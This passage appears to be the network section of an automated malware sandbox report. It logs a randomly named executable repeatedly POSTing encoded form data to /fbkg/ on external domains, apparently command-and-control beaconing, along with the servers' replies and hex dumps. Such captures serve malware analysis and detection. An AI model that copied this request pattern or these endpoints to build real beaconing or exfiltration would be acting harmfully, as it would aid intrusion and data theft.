                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefron
                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846538067 CET913INData Raw: 26 73 6f 75 72 63 65 25 35 42 75 75 69 64 25 35 44 3d 36 62 36 37 61 34 30 62 2d 66 32 38 30 2d 34 61 33 61 2d 61 66 36 37 2d 64 38 39 37 34 31 35 38 66 37 39 38 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f
                                                                                                                                                                                                Data Ascii: &source%5Buuid%5D=6b67a40b-f280-4a3a-af67-d8974158f798X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&sour
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846610069 CET915INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846662045 CET915INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                                                                                                Nov 17, 2023 19:30:13.846714973 CET915INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4192.168.11.205013191.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:24.414150000 CET303OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 6f 5a 36 2f 6c 71 4b 6c 67 42 70 35 53 38 63 71 59 32 42 4e 43 6f 6f 71 50 32 45 47 48 2b 6f 71 59 65 45 42 2b 79 35 4f 39 36 33 32 4e 50 41 39 72 75 70 6a 77 64 48 75 58 72 31 32 62 5a 79 31 35 4c 6f 30 4b 70 6a 44 63 64 67 47 57 30 54 5a 69 55 7a 73 6c 70 67 49 6d 74 66 73 6f 42 66 75 55 48 4b 64 4c 56 73 52 48 78 43 77 35 4c 48 44 37 38 6c 4d 36 64 52 49 6e 4b 4b 64 4a 4c 31 74 51 62 4e 6b 4c 35 38 69 44 53 45 6c 34 7a 4e 33 38 66 76 64 67 61 38 4d 66 48 37 4c 56 5a 56 55 45 76 32 74 68 44 56 4b 68 6e 46 48 70 41 45 63 6a 66 57 54 45 58 73 4b 43 4a 34 67 74 44 4e 5a 58 34 34 6b 64 34 62 43 77 64 4d 65 44 59 51 62 78 53 57 37 49 72 35 4b 70 46 4a 59 71 51 4f 38 62 76 4f 36 50 39 44 42 48 6b 41 69 6a 2b 71 4c 57 5a 72 48 46 61 4e 30 6f 57 6f 4c 6c 47 64 5a 2b 6a 50 43 45 5a 45 70 39 7a 73 79 35 66 51 4d 4e 5a 53 34 61 39 6f 79 34 6b 2b 2b 47 72 59 33 5a 51 32 65 46 79 54 4e 50 71 48 4a 65 53 59 4d 46 79 4c 68 7a 5a 33 6d 76 69 56 2f 51 51 31 74 44 71 45 41 72 71 41 30 43 66 54 79 4c 7a 47 36 4d 4f 75 65 53 61 57 74 59 58 48 73 62 30 4a 6c 34 4a 70 43 69 36 67 46 54 73 68 35 57 4f 38 42 4e 63 47 32 31 4f 76 6f 66 30 49 4e 51 34 50 31 35 57 45 6b 51 2b 6e 36 6e 46 50 62 50 77 31 78 78 49 61 47 36 66 32 4a 70 4a 31 58 35 4e 4d 53 63 32 35 53 30 45 6d 5a 4f 56 55 72 61 52 2b 44 70 49 74 73 6f 58 6d 58 39 55 54 56 4c 59 66 57 4b 59 6f 6d 59 6e 31 53 43 43 66 31 33 51 78 6a 4b 65 64 6e 58 36 77 69 42 6f 4d 50 34 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U13s8TPUkVaClAxEnDxOs/7MPTPulr1oZ6/lqKlgBp5S8cqY2BNCooqP2EGH+oqYeEB+y5O9632NPA9rupjwdHuXr12bZy15Lo0KpjDcdgGW0TZiUzslpgImtfsoBfuUHKdLVsRHxCw5LHD78lM6dRInKKdJL1tQbNkL58iDSEl4zN38fvdga8MfH7LVZVUEv2thDVKhnFHpAEcjfWTEXsKCJ4gtDNZX44kd4bCwdMeDYQbxSW7Ir5KpFJYqQO8bvO6P9DBHkAij+qLWZrHFaN0oWoLlGdZ+jPCEZEp9zsy5fQMNZS4a9oy4k++GrY3ZQ2eFyTNPqHJeSYMFyLhzZ3mviV/QQ1tDqEArqA0CfTyLzG6MOueSaWtYXHsb0Jl4JpCi6gFTsh5WO8BNcG21Ovof0INQ4P15WEkQ+n6nFPbPw1xxIaG6f2JpJ1X5NMSc25S0EmZOVUraR+DpItsoXmX9UTVLYfWKYomYn1SCCf13QxjKednX6wiBoMP4=
                                                                                                                                                                                                Nov 17, 2023 19:26:24.603250027 CET304INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:24 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                491.195.240.12380192.168.11.2050131C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:24.414150000 CET303OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 6f 5a 36 2f 6c 71 4b 6c 67 42 70 35 53 38 63 71 59 32 42 4e 43 6f 6f 71 50 32 45 47 48 2b 6f 71 59 65 45 42 2b 79 35 4f 39 36 33 32 4e 50 41 39 72 75 70 6a 77 64 48 75 58 72 31 32 62 5a 79 31 35 4c 6f 30 4b 70 6a 44 63 64 67 47 57 30 54 5a 69 55 7a 73 6c 70 67 49 6d 74 66 73 6f 42 66 75 55 48 4b 64 4c 56 73 52 48 78 43 77 35 4c 48 44 37 38 6c 4d 36 64 52 49 6e 4b 4b 64 4a 4c 31 74 51 62 4e 6b 4c 35 38 69 44 53 45 6c 34 7a 4e 33 38 66 76 64 67 61 38 4d 66 48 37 4c 56 5a 56 55 45 76 32 74 68 44 56 4b 68 6e 46 48 70 41 45 63 6a 66 57 54 45 58 73 4b 43 4a 34 67 74 44 4e 5a 58 34 34 6b 64 34 62 43 77 64 4d 65 44 59 51 62 78 53 57 37 49 72 35 4b 70 46 4a 59 71 51 4f 38 62 76 4f 36 50 39 44 42 48 6b 41 69 6a 2b 71 4c 57 5a 72 48 46 61 4e 30 6f 57 6f 4c 6c 47 64 5a 2b 6a 50 43 45 5a 45 70 39 7a 73 79 35 66 51 4d 4e 5a 53 34 61 39 6f 79 34 6b 2b 2b 47 72 59 33 5a 51 32 65 46 79 54 4e 50 71 48 4a 65 53 59 4d 46 79 4c 68 7a 5a 33 6d 76 69 56 2f 51 51 31 74 44 71 45 41 72 71 41 30 43 66 54 79 4c 7a 47 36 4d 4f 75 65 53 61 57 74 59 58 48 73 62 30 4a 6c 34 4a 70 43 69 36 67 46 54 73 68 35 57 4f 38 42 4e 63 47 32 31 4f 76 6f 66 30 49 4e 51 34 50 31 35 57 45 6b 51 2b 6e 36 6e 46 50 62 50 77 31 78 78 49 61 47 36 66 32 4a 70 4a 31 58 35 4e 4d 53 63 32 35 53 30 45 6d 5a 4f 56 55 72 61 52 2b 44 70 49 74 73 6f 58 6d 58 39 55 54 56 4c 59 66 57 4b 59 6f 6d 59 6e 31 53 43 43 66 31 33 51 78 6a 4b 65 64 6e 58 36 77 69 42 6f 4d 50 34 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U13s8TPUkVaClAxEnDxOs/7MPTPulr1oZ6/lqKlgBp5S8cqY2BNCooqP2EGH+oqYeEB+y5O9632NPA9rupjwdHuXr12bZy15Lo0KpjDcdgGW0TZiUzslpgImtfsoBfuUHKdLVsRHxCw5LHD78lM6dRInKKdJL1tQbNkL58iDSEl4zN38fvdga8MfH7LVZVUEv2thDVKhnFHpAEcjfWTEXsKCJ4gtDNZX44kd4bCwdMeDYQbxSW7Ir5KpFJYqQO8bvO6P9DBHkAij+qLWZrHFaN0oWoLlGdZ+jPCEZEp9zsy5fQMNZS4a9oy4k++GrY3ZQ2eFyTNPqHJeSYMFyLhzZ3mviV/QQ1tDqEArqA0CfTyLzG6MOueSaWtYXHsb0Jl4JpCi6gFTsh5WO8BNcG21Ovof0INQ4P15WEkQ+n6nFPbPw1xxIaG6f2JpJ1X5NMSc25S0EmZOVUraR+DpItsoXmX9UTVLYfWKYomYn1SCCf13QxjKednX6wiBoMP4=
                                                                                                                                                                                                Nov 17, 2023 19:26:24.603250027 CET304INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:26:24 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                40192.168.11.205016723.227.38.7480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:16.225250959 CET916OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.littlehappiez.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.littlehappiez.com
                                                                                                                                                                                                Referer: http://www.littlehappiez.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 74 52 4a 4b 7a 2b 4c 35 2f 79 6d 31 4c 75 49 6c 74 6c 65 39 5a 36 2b 38 69 6c 37 6f 6d 7a 79 62 73 45 6e 37 39 44 6a 58 59 69 75 51 4f 6f 47 34 4c 4c 5a 2b 66 76 75 4d 77 5a 46 46 38 48 2f 66 7a 72 65 54 76 52 62 4d 4e 77 47 73 44 38 6e 6f 53 38 48 76 45 32 61 59 4a 6f 69 33 38 39 50 6b 56 47 38 47 52 65 76 4c 71 4a 67 38 4c 70 2b 73 35 38 4c 39 76 4b 79 51 6e 50 4d 71 6e 42 6a 63 31 57 32 65 4d 46 56 7a 76 47 77 6a 69 53 52 64 36 78 4e 2b 56 47 59 53 34 72 38 4a 2b 6f 5a 67 64 4d 78 39 69 67 68 62 33 45 61 4b 4e 48 35 35 4d 2b 2f 6d 41 31 4f 6c 50 43 71 35 63 65 48 70 50 53 57 63 55 68 31 33 33 2f 38 33 41 6b 32 6b 43 6d 74 7a 4f 44 61 39 58 46 2b 51 47 68 42 61 66 6b 49 53 37 44 75 51 32 41 56 36 2f 5a 42 2b 54 32 73 4f 31 74 67 45 50 6b 76 42 70 56 79 49 58 48 32 6e 77 31 2f 65 4a 68 71 61 7a 44 48 6a 68 42 58 32 76 36 6f 2f 49 66 4d 6a 35 39 34 74 46 72 4b 55 67 4b 6f 61 4e 4c 63 7a 7a 38 61 30 56 43 72 67 37 4c 48 4e 54 53 71 6a 66 45 74 55 77 72 71 54 66 37 54 72 74 46 43 64 50 74 65 37 71 49 62 32 4b 51 52 55 41 6d 44 38 43 67 35 37 2f 58 49 52 70 38 4b 58 59 45 66 45 2b 2b 78 70 61 61 2b 70 59 55 4d 44 58 57 52 75 4b 2b 38 71 73 36 45 33 70 2f 67 58 43 2f 62 34 78 73 46 59 73 64 73 6a 30 38 41 61 39 4a 71 77 55 37 2b 78 78 71 46 67 63 38 34 63 69 4b 59 55 69 36 6a 46 44 57 68 65 54 30 48 75 68 7a 50 68 6f 74 70 67 43 53 31 77 35 61 63 6d 4b 38 33 46 79 48 6a 2f 69 55 42 44 56 6e 4f 50 6e 34 42 74 31 36 43 61 79 57 56 53 77 79 53 34 78 78 67 36 32 6c 36 32 58 58 4c 57 6e 78 71 76 54 74 55 2f 43 52 7a 53 70 38 54 4b 4f 63 59 3d
                                                                                                                                                                                                Data Ascii: T6I=tRJKz+L5/ym1LuIltle9Z6+8il7omzybsEn79DjXYiuQOoG4LLZ+fvuMwZFF8H/fzreTvRbMNwGsD8noS8HvE2aYJoi389PkVG8GRevLqJg8Lp+s58L9vKyQnPMqnBjc1W2eMFVzvGwjiSRd6xN+VGYS4r8J+oZgdMx9ighb3EaKNH55M+/mA1OlPCq5ceHpPSWcUh133/83Ak2kCmtzODa9XF+QGhBafkIS7DuQ2AV6/ZB+T2sO1tgEPkvBpVyIXH2nw1/eJhqazDHjhBX2v6o/IfMj594tFrKUgKoaNLczz8a0VCrg7LHNTSqjfEtUwrqTf7TrtFCdPte7qIb2KQRUAmD8Cg57/XIRp8KXYEfE++xpaa+pYUMDXWRuK+8qs6E3p/gXC/b4xsFYsdsj08Aa9JqwU7+xxqFgc84ciKYUi6jFDWheT0HuhzPhotpgCS1w5acmK83FyHj/iUBDVnOPn4Bt16CayWVSwyS4xxg62l62XXLWnxqvTtU/CRzSp8TKOcY=
                                                                                                                                                                                                Nov 17, 2023 19:30:16.632951975 CET918INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:16 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Sorting-Hat-PodId: 293
                                                                                                                                                                                                X-Sorting-Hat-ShopId: 83935199526
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-ShopId: 83935199526
                                                                                                                                                                                                X-ShardId: 293
                                                                                                                                                                                                Content-Language: en-US
                                                                                                                                                                                                Set-Cookie: localization=US; path=/; expires=Sun, 17 Nov 2024 18:30:16 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:16 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_y=15d791bb-846b-4020-ba40-e965674e6ec6; Expires=Sat, 16-Nov-24 18:30:16 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_s=bcbef681-e64c-4235-a7a1-28580292fec8; Expires=Fri, 17-Nov-23 19:00:16 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Server-Timing: processing;dur=249
                                                                                                                                                                                                X-Shopify-Stage: production
                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefron
                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633049011 CET919INData Raw: 26 73 6f 75 72 63 65 25 35 42 75 75 69 64 25 35 44 3d 34 64 62 64 37 34 30 32 2d 32 36 39 35 2d 34 34 62 65 2d 39 39 66 32 2d 39 66 36 30 39 38 65 66 63 35 32 39 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f
                                                                                                                                                                                                Data Ascii: &source%5Buuid%5D=4dbd7402-2695-44be-99f2-9f6098efc529X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&sour
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633117914 CET920INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633169889 CET921INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                                                                                                Nov 17, 2023 19:30:16.633217096 CET921INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4023.227.38.7480192.168.11.2050167C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:16.225250959 CET916OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.littlehappiez.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.littlehappiez.com
                                                                                                                                                                                                Referer: http://www.littlehappiez.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
